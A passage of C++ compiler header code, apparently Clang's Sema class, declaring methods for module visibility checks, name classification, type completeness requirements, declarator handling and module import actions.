llvm::SmallPtrSet<const NamespaceDecl*, 8> DeferredExportedNamespaces;
/// Get the module whose scope we are currently within.
Module *getCurrentModule() const {
return ModuleScopes.empty() ? nullptr : ModuleScopes.back().Module;
}
VisibleModuleSet VisibleModules;
public:
/// Get the module owning an entity.
Module *getOwningModule(const Decl *Entity) {
return Entity->getOwningModule();
}
/// Make a merged definition of an existing hidden definition \p ND
/// visible at the specified location.
void makeMergedDefinitionVisible(NamedDecl *ND);
bool isModuleVisible(const Module *M, bool ModulePrivate = false);
/// Determine whether a declaration is visible to name lookup.
bool isVisible(const NamedDecl *D) {
return !D->isHidden() || isVisibleSlow(D);
}
/// Determine whether any declaration of an entity is visible.
bool
hasVisibleDeclaration(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr) {
return isVisible(D) || hasVisibleDeclarationSlow(D, Modules);
}
bool hasVisibleDeclarationSlow(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules);
bool hasVisibleMergedDefinition(NamedDecl *Def);
bool hasMergedDefinitionInCurrentModule(NamedDecl *Def);
/// Determine if \p D and \p Suggested have a structurally compatible
/// layout as described in C11 6.2.7/1.
bool hasStructuralCompatLayout(Decl *D, Decl *Suggested);
/// Determine if \p D has a visible definition. If not, suggest a declaration
/// that should be made visible to expose the definition.
bool hasVisibleDefinition(NamedDecl *D, NamedDecl **Suggested,
bool OnlyNeedComplete = false);
bool hasVisibleDefinition(const NamedDecl *D) {
NamedDecl *Hidden;
return hasVisibleDefinition(const_cast<NamedDecl*>(D), &Hidden);
}
/// Determine if the template parameter \p D has a visible default argument.
bool
hasVisibleDefaultArgument(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is an explicit
/// specialization declaration for a specialization of a template. (For a
/// member specialization, use hasVisibleMemberSpecialization.)
bool hasVisibleExplicitSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is a member
/// specialization declaration (as opposed to an instantiated declaration).
bool hasVisibleMemberSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if \p A and \p B are equivalent internal linkage declarations
/// from different modules, and thus an ambiguity error can be downgraded to
/// an extension warning.
bool isEquivalentInternalLinkageDeclaration(const NamedDecl *A,
const NamedDecl *B);
void diagnoseEquivalentInternalLinkageDeclarations(
SourceLocation Loc, const NamedDecl *D,
ArrayRef<const NamedDecl *> Equiv);
bool isUsualDeallocationFunction(const CXXMethodDecl *FD);
bool isCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind = CompleteTypeKind::Default) {
return !RequireCompleteTypeImpl(Loc, T, Kind, nullptr);
}
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser &Diagnoser);
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, unsigned DiagID);
bool RequireCompleteType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, Diagnoser);
}
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, DiagID);
}
template <typename... Ts>
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, CompleteTypeKind::Normal, Diagnoser);
}
void completeExprArrayBound(Expr *E);
bool RequireCompleteExprType(Expr *E, CompleteTypeKind Kind,
TypeDiagnoser &Diagnoser);
bool RequireCompleteExprType(Expr *E, unsigned DiagID);
template <typename... Ts>
bool RequireCompleteExprType(Expr *E, unsigned DiagID, const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Default, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedExprType(Expr *E, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Normal, Diagnoser);
}
bool RequireLiteralType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID);
template <typename... Ts>
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireLiteralType(Loc, T, Diagnoser);
}
QualType getElaboratedType(ElaboratedTypeKeyword Keyword,
const CXXScopeSpec &SS, QualType T,
TagDecl *OwnedTagDecl = nullptr);
QualType BuildTypeofExprType(Expr *E, SourceLocation Loc);
/// If AsUnevaluated is false, E is treated as though it were an evaluated
/// context, such as when building a type for decltype(auto).
QualType BuildDecltypeType(Expr *E, SourceLocation Loc,
bool AsUnevaluated = true);
QualType BuildUnaryTransformType(QualType BaseType,
UnaryTransformType::UTTKind UKind,
SourceLocation Loc);
//===--------------------------------------------------------------------===//
// Symbol table / Decl tracking callbacks: SemaDecl.cpp.
//
struct SkipBodyInfo {
SkipBodyInfo()
: ShouldSkip(false), CheckSameAsPrevious(false), Previous(nullptr),
New(nullptr) {}
bool ShouldSkip;
bool CheckSameAsPrevious;
NamedDecl *Previous;
NamedDecl *New;
};
DeclGroupPtrTy ConvertDeclToDeclGroup(Decl *Ptr, Decl *OwnedType = nullptr);
void DiagnoseUseOfUnimplementedSelectors();
bool isSimpleTypeSpecifier(tok::TokenKind Kind) const;
ParsedType getTypeName(const IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec *SS = nullptr,
bool isClassName = false, bool HasTrailingDot = false,
ParsedType ObjectType = nullptr,
bool IsCtorOrDtorName = false,
bool WantNontrivialTypeSourceInfo = false,
bool IsClassTemplateDeductionContext = true,
IdentifierInfo **CorrectedII = nullptr);
TypeSpecifierType isTagName(IdentifierInfo &II, Scope *S);
bool isMicrosoftMissingTypename(const CXXScopeSpec *SS, Scope *S);
void DiagnoseUnknownTypeName(IdentifierInfo *&II,
SourceLocation IILoc,
Scope *S,
CXXScopeSpec *SS,
ParsedType &SuggestedType,
bool IsTemplateName = false);
/// Attempt to behave like MSVC in situations where lookup of an unqualified
/// type name has failed in a dependent context. In these situations, we
/// automatically form a DependentTypeName that will retry lookup in a related
/// scope during instantiation.
ParsedType ActOnMSVCUnknownTypeName(const IdentifierInfo &II,
SourceLocation NameLoc,
bool IsTemplateTypeArg);
/// Describes the result of the name lookup and resolution performed
/// by \c ClassifyName().
enum NameClassificationKind {
/// This name is not a type or template in this context, but might be
/// something else.
NC_Unknown,
/// Classification failed; an error has been produced.
NC_Error,
/// The name has been typo-corrected to a keyword.
NC_Keyword,
/// The name was classified as a type.
NC_Type,
/// The name was classified as a specific non-type, non-template
/// declaration. ActOnNameClassifiedAsNonType should be called to
/// convert the declaration to an expression.
NC_NonType,
/// The name was classified as an ADL-only function name.
/// ActOnNameClassifiedAsUndeclaredNonType should be called to convert the
/// result to an expression.
NC_UndeclaredNonType,
/// The name denotes a member of a dependent type that could not be
/// resolved. ActOnNameClassifiedAsDependentNonType should be called to
/// convert the result to an expression.
NC_DependentNonType,
/// The name was classified as a non-type, and an expression representing
/// that name has been formed.
NC_ContextIndependentExpr,
/// The name was classified as a template whose specializations are types.
NC_TypeTemplate,
/// The name was classified as a variable template name.
NC_VarTemplate,
/// The name was classified as a function template name.
NC_FunctionTemplate,
/// The name was classified as an ADL-only function template name.
NC_UndeclaredTemplate,
/// The name was classified as a concept name.
NC_Concept,
};
class NameClassification {
NameClassificationKind Kind;
union {
ExprResult Expr;
NamedDecl *NonTypeDecl;
TemplateName Template;
ParsedType Type;
};
explicit NameClassification(NameClassificationKind Kind) : Kind(Kind) {}
public:
NameClassification(ParsedType Type) : Kind(NC_Type), Type(Type) {}
NameClassification(const IdentifierInfo *Keyword) : Kind(NC_Keyword) {}
static NameClassification Error() {
return NameClassification(NC_Error);
}
static NameClassification Unknown() {
return NameClassification(NC_Unknown);
}
static NameClassification ContextIndependentExpr(ExprResult E) {
NameClassification Result(NC_ContextIndependentExpr);
Result.Expr = E;
return Result;
}
static NameClassification NonType(NamedDecl *D) {
NameClassification Result(NC_NonType);
Result.NonTypeDecl = D;
return Result;
}
static NameClassification UndeclaredNonType() {
return NameClassification(NC_UndeclaredNonType);
}
static NameClassification DependentNonType() {
return NameClassification(NC_DependentNonType);
}
static NameClassification TypeTemplate(TemplateName Name) {
NameClassification Result(NC_TypeTemplate);
Result.Template = Name;
return Result;
}
static NameClassification VarTemplate(TemplateName Name) {
NameClassification Result(NC_VarTemplate);
Result.Template = Name;
return Result;
}
static NameClassification FunctionTemplate(TemplateName Name) {
NameClassification Result(NC_FunctionTemplate);
Result.Template = Name;
return Result;
}
static NameClassification Concept(TemplateName Name) {
NameClassification Result(NC_Concept);
Result.Template = Name;
return Result;
}
static NameClassification UndeclaredTemplate(TemplateName Name) {
NameClassification Result(NC_UndeclaredTemplate);
Result.Template = Name;
return Result;
}
NameClassificationKind getKind() const { return Kind; }
ExprResult getExpression() const {
assert(Kind == NC_ContextIndependentExpr);
return Expr;
}
ParsedType getType() const {
assert(Kind == NC_Type);
return Type;
}
NamedDecl *getNonTypeDecl() const {
assert(Kind == NC_NonType);
return NonTypeDecl;
}
TemplateName getTemplateName() const {
assert(Kind == NC_TypeTemplate || Kind == NC_FunctionTemplate ||
Kind == NC_VarTemplate || Kind == NC_Concept ||
Kind == NC_UndeclaredTemplate);
return Template;
}
TemplateNameKind getTemplateNameKind() const {
switch (Kind) {
case NC_TypeTemplate:
return TNK_Type_template;
case NC_FunctionTemplate:
return TNK_Function_template;
case NC_VarTemplate:
return TNK_Var_template;
case NC_Concept:
return TNK_Concept_template;
case NC_UndeclaredTemplate:
return TNK_Undeclared_template;
default:
llvm_unreachable("unsupported name classification.");
}
}
};
/// Perform name lookup on the given name, classifying it based on
/// the results of name lookup and the following token.
///
/// This routine is used by the parser to resolve identifiers and help direct
/// parsing. When the identifier cannot be found, this routine will attempt
/// to correct the typo and classify based on the resulting name.
///
/// \param S The scope in which we're performing name lookup.
///
/// \param SS The nested-name-specifier that precedes the name.
///
/// \param Name The identifier. If typo correction finds an alternative name,
/// this pointer parameter will be updated accordingly.
///
/// \param NameLoc The location of the identifier.
///
/// \param NextToken The token following the identifier. Used to help
/// disambiguate the name.
///
/// \param CCC The correction callback, if typo correction is desired.
NameClassification ClassifyName(Scope *S, CXXScopeSpec &SS,
IdentifierInfo *&Name, SourceLocation NameLoc,
const Token &NextToken,
CorrectionCandidateCallback *CCC = nullptr);
/// Act on the result of classifying a name as an undeclared (ADL-only)
/// non-type declaration.
ExprResult ActOnNameClassifiedAsUndeclaredNonType(IdentifierInfo *Name,
SourceLocation NameLoc);
/// Act on the result of classifying a name as an undeclared member of a
/// dependent base class.
ExprResult ActOnNameClassifiedAsDependentNonType(const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsAddressOfOperand);
/// Act on the result of classifying a name as a specific non-type
/// declaration.
ExprResult ActOnNameClassifiedAsNonType(Scope *S, const CXXScopeSpec &SS,
NamedDecl *Found,
SourceLocation NameLoc,
const Token &NextToken);
/// Describes the detailed kind of a template name. Used in diagnostics.
enum class TemplateNameKindForDiagnostics {
ClassTemplate,
FunctionTemplate,
VarTemplate,
AliasTemplate,
TemplateTemplateParam,
Concept,
DependentTemplate
};
TemplateNameKindForDiagnostics
getTemplateNameKindForDiagnostics(TemplateName Name);
/// Determine whether it's plausible that E was intended to be a
/// template-name.
bool mightBeIntendedToBeTemplateName(ExprResult E, bool &Dependent) {
if (!getLangOpts().CPlusPlus || E.isInvalid())
return false;
Dependent = false;
if (auto *DRE = dyn_cast<DeclRefExpr>(E.get()))
return !DRE->hasExplicitTemplateArgs();
if (auto *ME = dyn_cast<MemberExpr>(E.get()))
return !ME->hasExplicitTemplateArgs();
Dependent = true;
if (auto *DSDRE = dyn_cast<DependentScopeDeclRefExpr>(E.get()))
return !DSDRE->hasExplicitTemplateArgs();
if (auto *DSME = dyn_cast<CXXDependentScopeMemberExpr>(E.get()))
return !DSME->hasExplicitTemplateArgs();
// Any additional cases recognized here should also be handled by
// diagnoseExprIntendedAsTemplateName.
return false;
}
void diagnoseExprIntendedAsTemplateName(Scope *S, ExprResult TemplateName,
SourceLocation Less,
SourceLocation Greater);
Decl *ActOnDeclarator(Scope *S, Declarator &D);
NamedDecl *HandleDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParameterLists);
void RegisterLocallyScopedExternCDecl(NamedDecl *ND, Scope *S);
bool DiagnoseClassNameShadow(DeclContext *DC, DeclarationNameInfo Info);
bool diagnoseQualifiedDeclaration(CXXScopeSpec &SS, DeclContext *DC,
DeclarationName Name, SourceLocation Loc,
bool IsTemplateId);
void
diagnoseIgnoredQualifiers(unsigned DiagID, unsigned Quals,
SourceLocation FallbackLoc,
SourceLocation ConstQualLoc = SourceLocation(),
SourceLocation VolatileQualLoc = SourceLocation(),
SourceLocation RestrictQualLoc = SourceLocation(),
SourceLocation AtomicQualLoc = SourceLocation(),
SourceLocation UnalignedQualLoc = SourceLocation());
void diagnosePointerAuthDisabled(SourceLocation loc, SourceRange range);
bool checkConstantPointerAuthKey(Expr *keyExpr, unsigned &key);
static bool adjustContextForLocalExternDecl(DeclContext *&DC);
void DiagnoseFunctionSpecifiers(const DeclSpec &DS);
NamedDecl *getShadowedDeclaration(const TypedefNameDecl *D,
const LookupResult &R);
NamedDecl *getShadowedDeclaration(const VarDecl *D, const LookupResult &R);
void CheckShadow(NamedDecl *D, NamedDecl *ShadowedDecl,
const LookupResult &R);
void CheckShadow(Scope *S, VarDecl *D);
/// Warn if 'E', which is an expression that is about to be modified, refers
/// to a shadowing declaration.
void CheckShadowingDeclModification(Expr *E, SourceLocation Loc);
void DiagnoseShadowingLambdaDecls(const sema::LambdaScopeInfo *LSI);
private:
/// Map of current shadowing declarations to shadowed declarations. Warn if
/// it looks like the user is trying to modify the shadowing declaration.
llvm::DenseMap<const NamedDecl *, const NamedDecl *> ShadowingDecls;
public:
void CheckCastAlign(Expr *Op, QualType T, SourceRange TRange);
void handleTagNumbering(const TagDecl *Tag, Scope *TagScope);
void setTagNameForLinkagePurposes(TagDecl *TagFromDeclSpec,
TypedefNameDecl *NewTD);
void CheckTypedefForVariablyModifiedType(Scope *S, TypedefNameDecl *D);
NamedDecl* ActOnTypedefDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous);
NamedDecl* ActOnTypedefNameDecl(Scope* S, DeclContext* DC, TypedefNameDecl *D,
LookupResult &Previous, bool &Redeclaration);
NamedDecl *ActOnVariableDeclarator(Scope *S, Declarator &D, DeclContext *DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope,
ArrayRef<BindingDecl *> Bindings = None);
NamedDecl *
ActOnDecompositionDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists);
// Returns true if the variable declaration is a redeclaration
bool CheckVariableDeclaration(VarDecl *NewVD, LookupResult &Previous);
void CheckVariableDeclarationType(VarDecl *NewVD);
bool DeduceVariableDeclarationType(VarDecl *VDecl, bool DirectInit,
Expr *Init);
void CheckCompleteVariableDeclaration(VarDecl *VD);
void CheckCompleteDecompositionDeclaration(DecompositionDecl *DD);
void MaybeSuggestAddingStaticToDecl(const FunctionDecl *D);
NamedDecl* ActOnFunctionDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope);
bool AddOverriddenMethods(CXXRecordDecl *DC, CXXMethodDecl *MD);
enum class CheckConstexprKind {
/// Diagnose issues that are non-constant or that are extensions.
Diagnose,
/// Identify whether this function satisfies the formal rules for constexpr
/// functions in the current lanugage mode (with no extensions).
CheckValid
};
bool CheckConstexprFunctionDefinition(const FunctionDecl *FD,
CheckConstexprKind Kind);
void DiagnoseHiddenVirtualMethods(CXXMethodDecl *MD);
void FindHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
void NoteHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
// Returns true if the function declaration is a redeclaration
bool CheckFunctionDeclaration(Scope *S,
FunctionDecl *NewFD, LookupResult &Previous,
bool IsMemberSpecialization);
bool shouldLinkDependentDeclWithPrevious(Decl *D, Decl *OldDecl);
bool canFullyTypeCheckRedeclaration(ValueDecl *NewD, ValueDecl *OldD,
QualType NewT, QualType OldT);
void CheckMain(FunctionDecl *FD, const DeclSpec &D);
void CheckMSVCRTEntryPoint(FunctionDecl *FD);
Attr *getImplicitCodeSegOrSectionAttrForFunction(const FunctionDecl *FD,
bool IsDefinition);
void CheckFunctionOrTemplateParamDeclarator(Scope *S, Declarator &D);
Decl *ActOnParamDeclarator(Scope *S, Declarator &D);
ParmVarDecl *BuildParmVarDeclForTypedef(DeclContext *DC,
SourceLocation Loc,
QualType T);
QualType adjustParameterTypeForObjCAutoRefCount(QualType T,
SourceLocation NameLoc,
TypeSourceInfo *TSInfo);
ParmVarDecl *CheckParameter(DeclContext *DC, SourceLocation StartLoc,
SourceLocation NameLoc, IdentifierInfo *Name,
QualType T, TypeSourceInfo *TSInfo,
StorageClass SC);
void ActOnParamDefaultArgument(Decl *param,
SourceLocation EqualLoc,
Expr *defarg);
void ActOnParamUnparsedDefaultArgument(Decl *param,
SourceLocation EqualLoc,
SourceLocation ArgLoc);
void ActOnParamDefaultArgumentError(Decl *param, SourceLocation EqualLoc);
bool SetParamDefaultArgument(ParmVarDecl *Param, Expr *DefaultArg,
SourceLocation EqualLoc);
// Contexts where using non-trivial C union types can be disallowed. This is
// passed to err_non_trivial_c_union_in_invalid_context.
enum NonTrivialCUnionContext {
// Function parameter.
NTCUC_FunctionParam,
// Function return.
NTCUC_FunctionReturn,
// Default-initialized object.
NTCUC_DefaultInitializedObject,
// Variable with automatic storage duration.
NTCUC_AutoVar,
// Initializer expression that might copy from another object.
NTCUC_CopyInit,
// Assignment.
NTCUC_Assignment,
// Compound literal.
NTCUC_CompoundLiteral,
// Block capture.
NTCUC_BlockCapture,
// lvalue-to-rvalue conversion of volatile type.
NTCUC_LValueToRValueVolatile,
};
/// Emit diagnostics if the initializer or any of its explicit or
/// implicitly-generated subexpressions require copying or
/// default-initializing a type that is or contains a C union type that is
/// non-trivial to copy or default-initialize.
void checkNonTrivialCUnionInInitializer(const Expr *Init, SourceLocation Loc);
// These flags are passed to checkNonTrivialCUnion.
enum NonTrivialCUnionKind {
NTCUK_Init = 0x1,
NTCUK_Destruct = 0x2,
NTCUK_Copy = 0x4,
};
/// Emit diagnostics if a non-trivial C union type or a struct that contains
/// a non-trivial C union is used in an invalid context.
void checkNonTrivialCUnion(QualType QT, SourceLocation Loc,
NonTrivialCUnionContext UseContext,
unsigned NonTrivialKind);
void AddInitializerToDecl(Decl *dcl, Expr *init, bool DirectInit);
void ActOnUninitializedDecl(Decl *dcl);
void ActOnInitializerError(Decl *Dcl);
void ActOnPureSpecifier(Decl *D, SourceLocation PureSpecLoc);
void ActOnCXXForRangeDecl(Decl *D);
StmtResult ActOnCXXForRangeIdentifier(Scope *S, SourceLocation IdentLoc,
IdentifierInfo *Ident,
ParsedAttributes &Attrs,
SourceLocation AttrEnd);
void SetDeclDeleted(Decl *dcl, SourceLocation DelLoc);
void SetDeclDefaulted(Decl *dcl, SourceLocation DefaultLoc);
void CheckStaticLocalForDllExport(VarDecl *VD);
void FinalizeDeclaration(Decl *D);
DeclGroupPtrTy FinalizeDeclaratorGroup(Scope *S, const DeclSpec &DS,
ArrayRef<Decl *> Group);
DeclGroupPtrTy BuildDeclaratorGroup(MutableArrayRef<Decl *> Group);
/// Should be called on all declarations that might have attached
/// documentation comments.
void ActOnDocumentableDecl(Decl *D);
void ActOnDocumentableDecls(ArrayRef<Decl *> Group);
void ActOnFinishKNRParamDeclarations(Scope *S, Declarator &D,
SourceLocation LocAfterDecls);
void CheckForFunctionRedefinition(
FunctionDecl *FD, const FunctionDecl *EffectiveDefinition = nullptr,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Decl *D,
SkipBodyInfo *SkipBody = nullptr);
void ActOnStartTrailingRequiresClause(Scope *S, Declarator &D);
ExprResult ActOnFinishTrailingRequiresClause(ExprResult ConstraintExpr);
void ActOnStartOfObjCMethodDef(Scope *S, Decl *D);
bool isObjCMethodDecl(Decl *D) {
return D && isa<ObjCMethodDecl>(D);
}
/// Determine whether we can delay parsing the body of a function or
/// function template until it is used, assuming we don't care about emitting
/// code for that function.
///
/// This will be \c false if we may need the body of the function in the
/// middle of parsing an expression (where it's impractical to switch to
/// parsing a different function), for instance, if it's constexpr in C++11
/// or has an 'auto' return type in C++14. These cases are essentially bugs.
bool canDelayFunctionBody(const Declarator &D);
/// Determine whether we can skip parsing the body of a function
/// definition, assuming we don't care about analyzing its body or emitting
/// code for that function.
///
/// This will be \c false only if we may need the body of the function in
/// order to parse the rest of the program (for instance, if it is
/// \c constexpr in C++11 or has an 'auto' return type in C++14).
bool canSkipFunctionBody(Decl *D);
void computeNRVO(Stmt *Body, sema::FunctionScopeInfo *Scope);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body, bool IsInstantiation);
Decl *ActOnSkippedFunctionBody(Decl *Decl);
void ActOnFinishInlineFunctionDef(FunctionDecl *D);
/// ActOnFinishDelayedAttribute - Invoked when we have finished parsing an
/// attribute for which parsing is delayed.
void ActOnFinishDelayedAttribute(Scope *S, Decl *D, ParsedAttributes &Attrs);
/// Diagnose any unused parameters in the given sequence of
/// ParmVarDecl pointers.
void DiagnoseUnusedParameters(ArrayRef<ParmVarDecl *> Parameters);
/// Diagnose whether the size of parameters or return value of a
/// function or obj-c method definition is pass-by-value and larger than a
/// specified threshold.
void
DiagnoseSizeOfParametersAndReturnValue(ArrayRef<ParmVarDecl *> Parameters,
QualType ReturnTy, NamedDecl *D);
void DiagnoseInvalidJumps(Stmt *Body);
Decl *ActOnFileScopeAsmDecl(Expr *expr,
SourceLocation AsmLoc,
SourceLocation RParenLoc);
/// Handle a C++11 empty-declaration and attribute-declaration.
Decl *ActOnEmptyDeclaration(Scope *S, const ParsedAttributesView &AttrList,
SourceLocation SemiLoc);
enum class ModuleDeclKind {
Interface, ///< 'export module X;'
Implementation, ///< 'module X;'
};
/// The parser has processed a module-declaration that begins the definition
/// of a module interface or implementation.
DeclGroupPtrTy ActOnModuleDecl(SourceLocation StartLoc,
SourceLocation ModuleLoc, ModuleDeclKind MDK,
ModuleIdPath Path, bool IsFirstDecl);
/// The parser has processed a global-module-fragment declaration that begins
/// the definition of the global module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
DeclGroupPtrTy ActOnGlobalModuleFragmentDecl(SourceLocation ModuleLoc);
/// The parser has processed a private-module-fragment declaration that begins
/// the definition of the private module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
/// \param PrivateLoc The location of the 'private' keyword.
DeclGroupPtrTy ActOnPrivateModuleFragmentDecl(SourceLocation ModuleLoc,
SourceLocation PrivateLoc);
/// The parser has processed a module import declaration.
///
/// \param StartLoc The location of the first token in the declaration. This
/// could be the location of an '@', 'export', or 'import'.
/// \param ExportLoc The location of the 'export' keyword, if any.
/// \param ImportLoc The location of the 'import' keyword.
/// \param Path The module access path.
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, ModuleIdPath Path);
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, Module *M,
ModuleIdPath Path = {});
/// The parser has processed a module import translated from a
/// #include or similar preprocessing directive.
void ActOnModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
void BuildModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
/// The parsed has entered a submodule.
void ActOnModuleBegin(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has left a submodule.
void ActOnModuleEnd(SourceLocation DirectiveLoc, Module *Mod);
/// Create an implicit import of the given module at the given
/// source location, for error recovery, if possible.
///
/// This routine is typically used when an entity found by name lookup
/// is actually hidden within a module that we know about but the user
/// has forgotten to import.
void createImplicitModuleImportForErrorRecovery(SourceLocation Loc,
Module *Mod);
/// Kinds of missing import. Note, the values of these enumerators correspond
/// to %select values in diagnostics.
enum class MissingImportKind {
Declaration,
Definition,
DefaultArgument,
ExplicitSpecialization,
PartialSpecialization
};
/// Diagnose that the specified declaration needs to be visible but
/// isn't, and suggest a module import that would resolve the problem.
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
MissingImportKind MIK, bool Recover = true);
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
SourceLocation DeclLoc, ArrayRef<Module *> Modules,
MissingImportKind MIK, bool Recover);
Decl *ActOnStartExportDecl(Scope *S, SourceLocation ExportLoc,
SourceLocation LBraceLoc);
Decl *ActOnFinishExportDecl(Scope *S, Decl *ExportDecl,
SourceLocation RBraceLoc);
/// We've found a use of a templated declaration that would trigger an
/// implicit instantiation. Check that any relevant explicit specializations
/// and partial specializations are visible, and diagnose if not.
void checkSpecializationVisibility(SourceLocation Loc, NamedDecl *Spec);
/// We've found a use of a template specialization that would select a
/// partial specialization. Check that the partial specialization is visible,
/// and diagnose if not.
void checkPartialSpecializationVisibility(SourceLocation Loc,
NamedDecl *Spec);
/// Retrieve a suitable printing policy for diagnostics.
PrintingPolicy getPrintingPolicy() const {
return getPrintingPolicy(Context, PP);
}
/// Retrieve a suitable printing policy for diagnostics.
static PrintingPolicy getPrintingPolicy(const ASTContext &Ctx,
const Preprocessor &PP);
/// Scope actions.
void ActOnPopScope(SourceLocation Loc, Scope *S);
void ActOnTranslationUnitScope(Scope *S);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
RecordDecl *&AnonRecord);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
MultiTemplateParamsArg TemplateParams,
bool IsExplicitInstantiation,
RecordDecl *&AnonRecord);
Decl *BuildAnonymousStructOrUnion(Scope *S, DeclSpec &DS,
AccessSpecifier AS,
RecordDecl *Record,
const PrintingPolicy &Policy);
Decl *BuildMicrosoftCAnonymousStruct(Scope *S, DeclSpec &DS,
RecordDecl *Record);
/// Common ways to introduce type names without a tag for use in diagnostics.
/// Keep in sync with err_tag_reference_non_tag.
enum NonTagKind {
NTK_NonStruct,
NTK_NonClass,
NTK_NonUnion,
NTK_NonEnum,
NTK_Typedef,
NTK_TypeAlias,
NTK_Template,
NTK_TypeAliasTemplate,
NTK_TemplateTemplateArgument,
};
/// Given a non-tag type declaration, returns an enum useful for indicating
/// what kind of non-tag type this is.
NonTagKind getNonTagTypeDeclKind(const Decl *D, TagTypeKind TTK);
bool isAcceptableTagRedeclaration(const TagDecl *Previous,
TagTypeKind NewTag, bool isDefinition,
SourceLocation NewTagLoc,
const IdentifierInfo *Name);
enum TagUseKind {
TUK_Reference, // Reference to a tag: 'struct foo *X;'
TUK_Declaration, // Fwd decl of a tag: 'struct foo;'
TUK_Definition, // Definition of a tag: 'struct foo { int X; } Y;'
TUK_Friend // Friend declaration: 'friend struct foo;'
};
Decl *ActOnTag(Scope *S, unsigned TagSpec, TagUseKind TUK,
SourceLocation KWLoc, CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc, const ParsedAttributesView &Attr,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
MultiTemplateParamsArg TemplateParameterLists, bool &OwnedDecl,
bool &IsDependent, SourceLocation ScopedEnumKWLoc,
bool ScopedEnumUsesClassTag, TypeResult UnderlyingType,
bool IsTypeSpecifier, bool IsTemplateParamOrArg,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnTemplatedFriendTag(Scope *S, SourceLocation FriendLoc,
unsigned TagSpec, SourceLocation TagLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TempParamLists);
TypeResult ActOnDependentTag(Scope *S,
unsigned TagSpec,
TagUseKind TUK,
const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation TagLoc,
SourceLocation NameLoc);
void ActOnDefs(Scope *S, Decl *TagD, SourceLocation DeclStart,
IdentifierInfo *ClassName,
SmallVectorImpl<Decl *> &Decls);
Decl *ActOnField(Scope *S, Decl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth);
FieldDecl *HandleField(Scope *S, RecordDecl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS);
MSPropertyDecl *HandleMSProperty(Scope *S, RecordDecl *TagD,
SourceLocation DeclStart, Declarator &D,
